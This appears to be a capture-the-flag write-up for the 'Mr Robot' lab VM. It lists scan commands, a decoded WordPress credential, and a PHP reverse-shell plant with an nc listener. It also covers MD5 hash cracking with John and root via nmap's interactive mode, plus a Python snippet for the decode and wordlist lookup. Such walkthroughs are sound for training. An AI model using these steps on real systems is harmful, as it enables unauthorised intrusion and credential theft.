Mr Robot CTF
Based on the Mr. Robot show, can you root this box?
Room link is here.
Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?
Let’s start the room with the basics.
nmap -sV -sC -A IP
- Port 22 – SSH
- Port 80 – http
- Port 443 – ssl/http
Now, let's check out the webserver!
The commands displayed on this page don’t give you anything that would help you.
If you haven’t seen the show yet, I recommend you do not try these commands, as they contain spoilers!
On this page we don’t have any information to help us, so I decided to do a gobuster scan (directory search).
gobuster dir -u IP -w /usr/share/wordlists/dirb/common.txt
The first hint for the first question is “Robots”
And we have the directory “robots.txt”
Here is the first KEY!
From this point I've found 2 ways to find the next key:
From the gobuster scan we found a WordPress admin login page, and /robots.txt lists a file “fsocity.dic”, a wordlist which we could use to brute-force the WordPress login page (this is a waste of time).
There is another interesting directory -> /license
If we scroll down we find a string in base64
We can decode this on BASE64 DECODER
https://base64.guru/converter/decode/text
ZWxsaW90OkVSMjgtMDY1Mgo= --> elliot:ER28-0652
And just like that, we have the WordPress credentials:
Now the tricky part, and my favourite part of this room.
We need to get a reverse shell:
First go to “Appearance” – “Editor” – “Archives”
At this step, we replace the code shown in the editor with the PHP reverse shell that we can copy from GitHub.
PHP REVERSE SHELL
To catch the shell you have to listen on port 4444 (or the port you have chosen):
NETCAT
nc -lvnp 4444
Then browse to IP/wp-content/themes/twentyfifteen/archive.php to trigger the shell.
I added:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/anyname.py
python /tmp/anyname.py
to get a stable shell.
The second key is in /home/robot/, but unfortunately we don’t have permission to read it.
Luckily there is another file in that directory with the password hash for the robot user.
To crack this hash we use John the Ripper.
echo 'c3fcd3d76192e4007dfb496cca67e13b' > anyfilename
john --format=raw-md5 --wordlist=rockyou.txt anyfilename
john --show --format=RAW-MD5 anyfilename
> ?: abcdefghijklmnopqrstuvwxyz (this is the password)
Now, simply connect as "robot".
su robot
and the password is **abcdefghijklmnopqrstuvwxyz**
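As an added example (not part of the original writeup), the two credential steps above are reproduced offline in Python: decoding the base64 string found on /license, and checking the robot user's hash against a wordlist the way john does. The wordlist is a small constructed stand-in for rockyou.txt; the lookup succeeds because the hash is an unsalted MD5 digest (the password is the MD5 test vector from RFC 1321), so one fast digest per candidate is all it takes.

```python
import base64
import hashlib
from typing import Iterable, Optional, Tuple

# Values taken from the writeup above: the base64 string found on /license
# and the raw-MD5 hash stored next to the robot user's key.
LICENSE_B64 = "ZWxsaW90OkVSMjgtMDY1Mgo="
ROBOT_HASH = "c3fcd3d76192e4007dfb496cca67e13b"

# Constructed stand-in for a wordlist; rockyou.txt is not embedded here.
SAMPLE_WORDLIST = ["password", "elliot", "abcdefghijklmnopqrstuvwxyz", "mrrobot"]


def decode_license_credential(b64_text: str) -> Tuple[str, str]:
    """Decode the /license blob into (user, password).

    The decoded text ends with a newline, which is stripped so the password
    can be used as-is for the WordPress login.
    """
    decoded = base64.b64decode(b64_text).decode("utf-8").strip()
    user, _, password = decoded.partition(":")
    return user, password


def looks_like_raw_md5(hash_text: str) -> bool:
    """True for a 32-character hex string: an unsalted MD5 digest, which is
    the format john's --format=raw-md5 expects."""
    h = hash_text.strip().lower()
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h)


def wordlist_match(hash_text: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the candidate whose MD5 digest equals the hash, else None.

    This is the same lookup john performs with --wordlist. It works because
    the hash is unsalted: every candidate costs a single fast digest, and
    the digest is identical on every system that stored this password.
    """
    target = hash_text.strip().lower()
    for word in candidates:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == target:
            return word
    return None


if __name__ == "__main__":
    print(decode_license_credential(LICENSE_B64))
    print(looks_like_raw_md5(ROBOT_HASH), wordlist_match(ROBOT_HASH, SAMPLE_WORDLIST))
```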
Now it remains to find the last key, which should be in /root.
The hint is NMAP
I used
find / -perm -u=s -type f 2>/dev/null
to list all files with the SUID bit set.
GTFOBins is, in my opinion, the best site for finding out how to use such binaries to get root access.
These are the commands to obtain root access:
nmap --interactive
nmap> !sh
Finally we found the final key!!!
It's a pretty old challenge, but a very good one. I hope you learned a lot from this writeup.
For any queries, feel free to drop a comment and follow me here for more ctf writeups.